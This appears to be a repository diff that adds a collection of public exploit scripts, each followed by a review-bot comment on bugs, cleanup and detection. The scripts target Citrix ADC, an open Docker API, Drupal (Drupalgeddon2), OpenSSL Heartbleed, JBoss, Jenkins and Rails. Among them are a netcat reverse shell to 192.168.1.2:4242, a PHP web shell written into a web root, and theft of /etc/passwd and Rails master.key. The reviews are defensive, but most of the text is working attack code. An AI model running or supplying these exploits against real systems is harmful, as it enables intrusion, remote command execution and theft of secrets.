return(1)
print("[%] Response:")
print(resp.text)
return(0)
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
if url:
if not do_exploit:
check(url)
else:
exploit(url, cmd)
if usedlist:
URLs_List = []
try:
f_file = open(str(usedlist), "r")
URLs_List = f_file.read().replace("\r", "").split("\n")
try:
URLs_List.remove("")
except ValueError:
pass
f_file.close()
except Exception as e:
print("Error: There was an error in reading list file.")
print("Exception: " + str(e))
exit(1)
for url in URLs_List:
if not do_exploit:
check(url)
else:
exploit(url, cmd)
print("[%] Done.")
if __name__ == "__main__":
try:
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
except KeyboardInterrupt:
print("\nKeyboardInterrupt Detected.")
print("Exiting...")
exit(0)
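Review bot: In `check()`, `random_value` is built from two random digits, so it can be as small as 0 to 9 and its square a single digit such as `0`, `1` or `4`. The test `str(multiplication_value) in resp.headers['Location']` then matches almost any redirect that contains a digit (a port number, for example) and prints "Vulnerable!" for an unaffected host. Draw the value from a range whose product is unlikely to occur by chance, e.g. `random_value = random.randint(1000, 9999)`.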


@ -0,0 +1,51 @@
#!/usr/bin/env python
# https://github.com/mpgn/CVE-2019-19781
# # #
import requests
import string
import random
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
print("Found by Mikhail Klyuchnikov")
print("")
if len(sys.argv) < 2:
print("[-] No URL provided")
sys.exit(0)
while True:
try:
command = input("command > ")
random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
print("[+] Adding bookmark", random_xml + ".xml")
burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
random_xml, "NSC_NONCE": "c", "Connection": "close"}
burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
if r.status_code == 200:
print("[+] Bookmark added")
else:
print("\n[-] Target not vulnerable or something went wrong")
sys.exit(0)
burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
random_xml, "NSC_NONCE": "c", "Connection": "close"}
r = requests.get(burp0_url, headers=burp0_headers,verify=False)
replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
print("[+] Result of the command: \n")
print(replaced)
except KeyboardInterrupt:
print("Exiting...")
break
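Review bot: The header comment gives only the upstream URL and does not say that every command entered writes a bookmark template to the appliance and that nothing in the loop removes it. The file is named by twelve random uppercase letters and digits plus `.xml` and is written through the `NSC_USER` path `../../../../netscaler/portal/templates/`. Document that side effect at the top of the file, for example `# NOTE: each command leaves a <random>.xml template under netscaler/portal/templates on the appliance; the script does not delete it`, so an authorised tester knows what to clean up and a responder knows what residue to look for. Both `requests` calls also pass `verify=False` with no `timeout`, so the loop blocks indefinitely on an unresponsive host.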


@ -0,0 +1,49 @@
from __future__ import print_function
import requests
import logging
import json
import urllib.parse
# NOTE
# Enable Remote API with the following command
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
# This is an intended feature, remember to filter the port 2375..
name = "docker"
description = "Docker RCE via Open Docker API on port 2375"
author = "Swissky"
# Step 1 - Extract id and name from each container
ip = "127.0.0.1"
port = "2375"
data = "containers/json"
url = "http://{}:{}/{}".format(ip, port, data)
r = requests.get(url)
if r.json:
for container in r.json():
container_id = container['Id']
container_name = container['Names'][0].replace('/','')
print((container_id, container_name))
# Step 2 - Prepare command
cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
data = "containers/{}/exec".format(container_name)
url = "http://{}:{}/{}".format(ip, port, data)
post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
post_header = {
"Content-Type": "application/json"
}
r = requests.post(url, json=json.loads(post_json))
# Step 3 - Execute command
id_cmd = r.json()['Id']
data = "exec/{}/start".format(id_cmd)
url = "http://{}:{}/{}".format(ip, port, data)
post_json = '{ "Detach":false,"Tty":false}'
post_header = {
"Content-Type": "application/json"
}
r = requests.post(url, json=json.loads(post_json))
print(r)
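Review bot: The NOTE comment at the top calls the TCP listener "an intended feature" and only says to filter port 2375, which understates the risk the rest of the file demonstrates. The script lists containers, creates an exec and starts it without sending any credentials, so the API as exposed by `-H tcp://0.0.0.0:2375` is being used unauthenticated. The comment should say so and point to the fix, e.g. `# Unauthenticated: anyone who can reach 2375 controls the daemon. Keep dockerd on the unix socket, or require client certificates with --tlsverify.` Separately, `if r.json:` tests the bound method rather than its result and is always true, and `post_header` is assigned twice but never passed to `requests.post`.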


@ -0,0 +1,308 @@
#!/usr/bin/env ruby
#
# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
#
# Authors:
# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
#
require 'base64'
require 'json'
require 'net/http'
require 'openssl'
require 'readline'
# Settings - Proxy information (nil to disable)
proxy_addr = nil
proxy_port = 8080
# Settings - General
$useragent = "drupalgeddon2"
webshell = "s.php"
writeshell = true
# Settings - Payload (we could just be happy without this, but we can do better!)
#bashcmd = "<?php if( isset( $_REQUEST[c] ) ) { eval( $_GET[c]) ); } ?>'
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Function http_post <url> [post]
def http_post(url, payload="")
uri = URI(url)
request = Net::HTTP::Post.new(uri.request_uri)
request.initialize_http_header({"User-Agent" => $useragent})
request.body = payload
return $http.request(request)
end
# Function gen_evil_url <cmd>
def gen_evil_url(evil, feedback=true)
# PHP function to use (don't forget about disabled functions...)
phpmethod = $drupalverion.start_with?('8')? "exec" : "passthru"
#puts "[*] PHP cmd: #{phpmethod}" if feedback
puts "[*] Payload: #{evil}" if feedback
## Check the version to match the payload
# Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render
if $drupalverion.start_with?('8')
# Method #1 - Drupal 8, mail, #post_render - response is 200
url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
# Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
#url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
elsif $drupalverion.start_with?('7')
# Method #3 - Drupal 7, name, #post_render - response is 200
url = $target + "?q=user/password&name[%23post_render][]=" + phpmethod + "&name[%23type]=markup&name[%23markup]=" + evil
payload = "form_id=user_pass&_triggering_element_name=name"
else
puts "[!] Unsupported Drupal version"
exit
end
# Drupal v7 needs an extra value from a form
if $drupalverion.start_with?('7')
response = http_post(url, payload)
form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
#url = $target + "file/ajax/name/%23value/" + form_build_id
url = $target + "?q=file/ajax/name/%23value/" + form_build_id
payload = "form_build_id=" + form_build_id
end
return url, payload
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Quick how to use
if ARGV.empty?
puts "Usage: ruby drupalggedon2.rb <target>"
puts " ruby drupalgeddon2.rb https://example.com"
exit
end
# Read in values
$target = ARGV[0]
# Check input for protocol
if not $target.start_with?('http')
$target = "http://#{$target}"
end
# Check input for the end
if not $target.end_with?('/')
$target += "/"
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Banner
puts "[*] --==[::#Drupalggedon2::]==--"
puts "-"*80
puts "[*] Target : #{$target}"
puts "[*] Write? : Skipping writing web shell" if not writeshell
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Setup connection
uri = URI($target)
$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
# Use SSL/TLS if needed
if uri.scheme == "https"
$http.use_ssl = true
$http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Try and get version
$drupalverion = nil
# Possible URLs
url = [
$target + "CHANGELOG.txt",
$target + "core/CHANGELOG.txt",
$target + "includes/bootstrap.inc",
$target + "core/includes/bootstrap.inc",
]
# Check all
url.each do|uri|
# Check response
response = http_post(uri)
if response.code == "200"
puts "[+] Found : #{uri} (#{response.code})"
# Patched already?
puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002"
# Try and get version from the file contents
$drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
# If not, try and get it from the URL
$drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.empty?
# Done!
break
elsif response.code == "403"
puts "[+] Found : #{uri} (#{response.code})"
# Get version from URL
$drupalverion = uri.match(/core/)? "8.x" : "7.x"
else
puts "[!] MISSING: #{uri} (#{response.code})"
end
end
# Feedback
if $drupalverion
status = $drupalverion.end_with?('x')? "?" : "!"
puts "[+] Drupal#{status}: #{$drupalverion}"
else
puts "[!] Didn't detect Drupal version"
puts "[!] Forcing Drupal v8.x attack"
$drupalverion = "8.x"
end
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Make a request, testing code execution
puts "[*] Testing: Code Execution"
# Generate a random string to see if we can echo it
random = (0...8).map { (65 + rand(26)).chr }.join
url, payload = gen_evil_url("echo #{random}")
response = http_post(url, payload)
if response.code == "200" and not response.body.empty?
#result = JSON.pretty_generate(JSON[response.body])
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
puts "[+] Result : #{result}"
puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[+] Target might to be exploitable?"
else
puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}"
exit
end
puts "-"*80
# Location of web shell & used to signal if using PHP shell
webshellpath = nil
prompt = "drupalgeddon2"
# Possibles paths to try
paths = [
"./",
"./sites/default/",
"./sites/default/files/",
]
# Check all
paths.each do|path|
puts "[*] Testing: File Write To Web Root (#{path})"
# Merge locations
webshellpath = "#{path}#{webshell}"
# Final command to execute
cmd = "#{bashcmd} | tee #{webshellpath}"
# Generate evil URLs
url, payload = gen_evil_url(cmd)
# Make the request
response = http_post(url, payload)
# Check result
if response.code == "200" and not response.body.empty?
# Feedback
#result = JSON.pretty_generate(JSON[response.body])
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
puts "[+] Result : #{result}"
# Test to see if backdoor is there (if we managed to write it)
response = http_post("#{$target}#{webshellpath}", "c=hostname")
if response.code == "200" and not response.body.empty?
puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!"
break
else
puts "[!] Target is NOT exploitable. No write access here!"
end
else
puts "[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}"
end
webshellpath = nil
end if writeshell
puts "-"*80 if writeshell
if webshellpath
# Get hostname for the prompt
prompt = response.body.to_s.strip
# Feedback
puts "[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'"
elsif writeshell
puts "[!] FAILED: Coudn't find writeable web path"
puts "[*] Dropping back direct commands (expect an ugly shell!)"
end
# Stop any CTRL + C action ;)
trap("INT", "SIG_IGN")
# Forever loop
loop do
# Default value
result = "ERROR"
# Get input
command = Readline.readline("#{prompt}>> ", true).to_s
# Exit
break if command =~ /exit/
# Blank link?
next if command.empty?
# If PHP shell
if webshellpath
# Send request
result = http_post("#{$target}#{webshell}", "c=#{command}").body
# Direct commands
else
url, payload = gen_evil_url(command, false)
response = http_post(url, payload)
if response.code == "200" and not response.body.empty?
result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body
end
end
# Feedback
puts result
end
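Review bot: The web shell written by the `paths.each` loop (`s.php`, via `tee #{webshellpath}`) is never removed when the prompt loop ends, so a host tested with this script keeps an unauthenticated command endpoint in its web root. A header comment should say so, for example `# NOTE: s.php is left on the target after exit; remove it and record the path in the test report`. For anyone using the file as a detection case, the fixed `$useragent = "drupalgeddon2"` and the `#post_render` form parameters are the request features to look for in web logs. Separately, the "Might be patched" warning interpolates `#{url}` (the whole candidate array) where `#{uri}` is meant.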


@ -0,0 +1,216 @@
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
from __future__ import print_function
from builtins import str
from builtins import range
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
import smtplib
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)')
options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory too (default: dump.bin)')
options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hbv10 = h2bin('''
18 03 01 00 03
01 40 00
''')
hbv11 = h2bin('''
18 03 02 00 03
01 40 00
''')
hbv12 = h2bin('''
18 03 03 00 03
01 40 00
''')
def hexdump(s, dumpf, quiet):
dump = open(dumpf,'a')
dump.write(s)
dump.close()
if quiet: return
for b in range(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print(' %04x: %-48s %s' % (b, hxdat, pdat))
print()
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
if not rdata:
return None
else:
return rdata
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print('Unexpected EOF receiving record header - server closed connection')
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print('Unexpected EOF receiving record payload - server closed connection')
return None, None, None
print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
return typ, ver, pay
def hit_hb(s, dumpf, host, quiet):
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print('No heartbeat response received from '+host+', server likely not vulnerable')
return False
if typ == 24:
if not quiet: print('Received heartbeat response:')
hexdump(pay, dumpf, quiet)
if len(pay) > 3:
print('WARNING: server '+ host +' returned more data than it should - server is vulnerable!')
else:
print('Server '+host+' processed malformed heartbeat, but did not return any extra data.')
return True
if typ == 21:
if not quiet: print('Received alert:')
hexdump(pay, dumpf, quiet)
print('Server '+ host +' returned error, likely not vulnerable')
return False
def connect(host, port, quiet):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not quiet: print('Connecting...')
sys.stdout.flush()
s.connect((host, port))
return s
def tls(s, quiet):
if not quiet: print('Sending Client Hello...')
sys.stdout.flush()
s.send(hello)
if not quiet: print('Waiting for Server Hello...')
sys.stdout.flush()
def parseresp(s):
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print('Server closed connection without sending Server Hello.')
return 0
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
return ver
def check(host, port, dumpf, quiet, starttls):
response = False
if starttls:
try:
s = smtplib.SMTP(host=host,port=port)
s.ehlo()
s.starttls()
except smtplib.SMTPException:
print('STARTTLS not supported...')
s.quit()
return False
print('STARTTLS supported...')
s.quit()
s = connect(host, port, quiet)
s.settimeout(1)
try:
re = s.recv(1024)
s.send('ehlo starttlstest\r\n')
re = s.recv(1024)
s.send('starttls\r\n')
re = s.recv(1024)
except socket.timeout:
print('Timeout issues, going ahead anyway, but it is probably broken ...')
tls(s,quiet)
else:
s = connect(host, port, quiet)
tls(s,quiet)
version = parseresp(s)
if version == 0:
if not quiet: print("Got an error while parsing the response, bailing ...")
return False
else:
version = version - 0x0300
if not quiet: print("Server TLS version was 1.%d\n" % version)
if not quiet: print('Sending heartbeat request...')
sys.stdout.flush()
if (version == 1):
s.send(hbv10)
response = hit_hb(s,dumpf, host, quiet)
if (version == 2):
s.send(hbv11)
response = hit_hb(s,dumpf, host, quiet)
if (version == 3):
s.send(hbv12)
response = hit_hb(s,dumpf, host, quiet)
s.close()
return response
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
print('Scanning ' + args[0] + ' on port ' + str(opts.port))
for i in range(0,opts.num):
check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)
if __name__ == '__main__':
main()
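Review bot: `hexdump` appends every heartbeat payload to `dump.bin` before the `quiet` check, so whatever memory a vulnerable server returns accumulates across runs in a file created with default permissions, and that memory can hold credentials or key material. Opening it with `with open(dumpf, 'a') as dump:` would also close the handle if `write` fails, and a comment such as `# dump may contain secrets from the tested host; store and delete it accordingly` belongs next to it. In `check`, the `version == 0` branch returns without `s.close()`. The `except smtplib.SMTPException` branch calls `s.quit()` although `s` is unbound when the `SMTP(...)` constructor itself raised.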


@ -0,0 +1,62 @@
#! /usr/bin/env python2
# Jboss Java Deserialization RCE (CVE-2015-7501)
# Made with <3 by @byt3bl33d3r
from __future__ import print_function
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
import sys, os
#from binascii import hexlify, unhexlify
from subprocess import check_output
ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']
ysoserial_path = None
parser = argparse.ArgumentParser()
parser.add_argument('target', type=str, help='Target IP')
parser.add_argument('command', type=str, help='Command to run on target')
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if not args.ysoserial_path:
for path in ysoserial_default_paths:
if os.path.exists(path):
ysoserial_path = path
else:
if os.path.exists(args.ysoserial_path):
ysoserial_path = args.ysoserial_path
if ysoserial_path is None:
print('[-] Could not find ysoserial JAR file')
sys.exit(1)
if len(args.target.split(":")) != 2:
print('[-] Target must be in format IP:PORT')
sys.exit(1)
if not args.command:
print('[-] You must specify a command to run')
sys.exit(1)
ip, port = args.target.split(':')
print('[*] Target IP: {}'.format(ip))
print('[*] Target PORT: {}'.format(port))
gadget = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])
r = requests.post('{}://{}:{}/invoker/JMXInvokerServlet'.format(args.proto, ip, port), verify=False, data=gadget)
if r.status_code == 200:
print('[+] Command executed successfully')
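Review bot: The result check at the end prints only on `r.status_code == 200` and nothing otherwise, and a 200 from `/invoker/JMXInvokerServlet` by itself shows that the servlet answered, not that the command ran, so the message overstates what was verified. I would word it as `print('[?] Servlet returned 200; confirm execution out of band')` and add `else: print('[-] HTTP status {}'.format(r.status_code))`. The `requests.post` call also has no `timeout=` and uses `verify=False` with the warning suppressed, which deserves a comment that the peer is unauthenticated; the Jenkins XML and Telerik scripts in later sections call `requests` the same way. In the ysoserial lookup, the `for path in ysoserial_default_paths` loop has no `break`, so the last existing path wins rather than the first.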

File diff suppressed because one or more lines are too long


@ -0,0 +1,84 @@
#! /usr/bin/env python2
#Jenkins Groovy XML RCE (CVE-2016-0792)
#Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins
#Made with <3 by @byt3bl33d3r
from __future__ import print_function
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import argparse
import sys
parser = argparse.ArgumentParser()
parser.add_argument('target', type=str, help='Target IP:PORT')
parser.add_argument('command', type=str, help='Command to run on target')
parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)')
if len(sys.argv) < 2:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if len(args.target.split(':')) != 2:
print('[-] Target must be in format IP:PORT')
sys.exit(1)
if not args.command:
print('[-] You must specify a command to run')
sys.exit(1)
ip, port = args.target.split(':')
print('[*] Target IP: {}'.format(ip))
print('[*] Target PORT: {}'.format(port))
xml_formatted = ''
command_list = args.command.split()
for cmd in command_list:
xml_formatted += '{:>16}<string>{}</string>\n'.format('', cmd)
xml_payload = '''<map>
<entry>
<groovy.util.Expando>
<expandoProperties>
<entry>
<string>hashCode</string>
<org.codehaus.groovy.runtime.MethodClosure>
<delegate class="groovy.util.Expando" reference="../../../.."/>
<owner class="java.lang.ProcessBuilder">
<command>
{}
</command>
<redirectErrorStream>false</redirectErrorStream>
</owner>
<resolveStrategy>0</resolveStrategy>
<directive>0</directive>
<parameterTypes/>
<maximumNumberOfParameters>0</maximumNumberOfParameters>
<method>start</method>
</org.codehaus.groovy.runtime.MethodClosure>
</entry>
</expandoProperties>
</groovy.util.Expando>
<int>1</int>
</entry>
</map>'''.format(xml_formatted.strip())
print('[*] Generated XML payload:')
print(xml_payload)
print()
print('[*] Sending payload')
headers = {'Content-Type': 'text/xml'}
r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload)
paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml']
if r.status_code == 500:
for path in paths_in_trace:
if path in r.text:
print('[+] Command executed successfully')
break
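Review bot: Nothing in the header says what the request looks like on the wire, which matters to anyone replaying this script as a detection test case. I would add a comment such as `# Sends one POST to /createItem?name=rand_dir with a text/xml body containing groovy.util.Expando and MethodClosure; the item name is fixed despite the "rand" prefix`. The success branch prints only when the status is 500 and a `rand_dir` path appears in the response text, so every other outcome ends silently; an `else: print('[-] HTTP status {}'.format(r.status_code))` would make failed runs visible.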


@ -0,0 +1,32 @@
#!/usr/bin/env python
# SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py
# DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b
from __future__ import print_function
from builtins import input
import requests
import sys
print("""
Jenkins Groovy Console cmd runner.
usage: ./jgc.py [HOST]
Then type any command and wait for STDOUT output from remote machine.
Type 'exit' to exit :)
""")
URL = sys.argv[1] + '/scriptText'
HEADERS = {
'User-Agent': 'jgc'
}
while 1:
CMD = input(">> Enter command to execute (or type 'exit' to exit): ")
if CMD == 'exit':
print("exiting...\n")
exit(0)
DATA = {
'script': 'println "{}".execute().text'.format(CMD)
}
result = requests.post(URL, headers=HEADERS, data=DATA)
print(result.text)
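Review bot: `URL = sys.argv[1] + '/scriptText'` is evaluated with no argument check, so running the script without a host prints the usage text and then stops with an `IndexError`. A guard such as `if len(sys.argv) != 2: sys.exit(1)` before that line fixes it. The header would also benefit from a comment that `/scriptText` is the Jenkins script console endpoint and that the script sends no credentials, so what it demonstrates is presumably an instance whose console is reachable without adequate access control; that setting is the one to review.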

File diff suppressed because one or more lines are too long


@ -0,0 +1,156 @@
require 'erb'
require "./demo-5.2.1/config/environment"
require "base64"
require 'net/http'
$proxy_addr = '127.0.0.1'
$proxy_port = 8080
$remote = "http://172.18.0.3:3000"
$ressource = "/demo"
puts "\nRails exploit CVE-2019-5418 + CVE-2019-5420 = RCE\n\n"
print "[+] Checking if vulnerable to CVE-2019-5418 => "
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = "../../../../../../../../../../etc/passwd{{"
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.body.include? "root:x:0:0:root:"
puts "\033[92mOK\033[0m"
else
puts "KO"
abort
end
print "[+] Getting file => credentials.yml.enc => "
path = "../../../../../../../../../../config/credentials.yml.enc{{"
for $i in 0..9
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = path[3..57]
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "200"
puts "\033[92mOK\033[0m"
File.open("credentials.yml.enc", 'w') { |file| file.write(res.body) }
break
end
path = path[3..57]
$i +=1;
end
print "[+] Getting file => master.key => "
path = "../../../../../../../../../../config/master.key{{"
for $i in 0..9
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = path[3..57]
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "200"
puts "\033[92mOK\033[0m"
File.open("master.key", 'w') { |file| file.write(res.body) }
break
end
path = path[3..57]
$i +=1;
end
print "[+] Decrypt secret_key_base => "
credentials_config_path = File.join("../", "credentials.yml.enc")
credentials_key_path = File.join("../", "master.key")
ENV["RAILS_MASTER_KEY"] = res.body
credentials = ActiveSupport::EncryptedConfiguration.new(
config_path: Rails.root.join(credentials_config_path),
key_path: Rails.root.join(credentials_key_path),
env_key: "RAILS_MASTER_KEY",
raise_if_missing_key: true
)
if credentials.secret_key_base != nil
puts "\033[92mOK\033[0m"
puts ""
puts "secret_key_base": credentials.secret_key_base
puts ""
end
puts "[+] Getting reflective command (R) or reverse shell (S) => "
loop do
begin
input = [(print 'Select option R or S: '), gets.rstrip][1]
if input == "R"
puts "Reflective command selected"
command = [(print "command (\033[92mreflected\033[0m): "), gets.rstrip][1]
elsif input == "S"
puts "Reverse shell selected"
command = [(print "command (\033[92mnot reflected\033[0m): "), gets.rstrip][1]
else
puts "No option selected"
abort
end
command_b64 = Base64.encode64(command)
print "[+] Generating payload CVE-2019-5420 => "
secret_key_base = credentials.secret_key_base
key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000))
secret = key_generator.generate_key("ActiveStorage")
verifier = ActiveSupport::MessageVerifier.new(secret)
if input == "R"
code = "system('bash','-c','" + command + " > /tmp/result.txt')"
else
code = "system('bash','-c','" + command + "')"
end
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@filename, "1"
erb.instance_variable_set :@lineno, 1
dump_target = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
puts "\033[92mOK\033[0m"
puts ""
url = $remote + "/rails/active_storage/disk/" + verifier.generate(dump_target, purpose: :blob_key) + "/test"
puts url
puts ""
print "[+] Sending request => "
uri = URI(url)
req = Net::HTTP::Get.new(uri)
req['Accept'] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "500"
puts "\033[92mOK\033[0m"
else
puts "KO"
abort
end
if input == "R"
print "[+] Getting result of command => "
uri = URI($remote + $ressource)
req = Net::HTTP::Get.new(uri)
req['Accept'] = "../../../../../../../../../../tmp/result.txt{{"
res = Net::HTTP.start(uri.hostname, uri.port, $proxy_addr, $proxy_port) {|http|
http.request(req)
}
if res.code == "200"
puts "\033[92mOK\033[0m\n\n"
puts res.body
puts "\n"
else
puts "KO"
abort
end
end
rescue Exception => e
puts "Exiting..."
abort
end
end
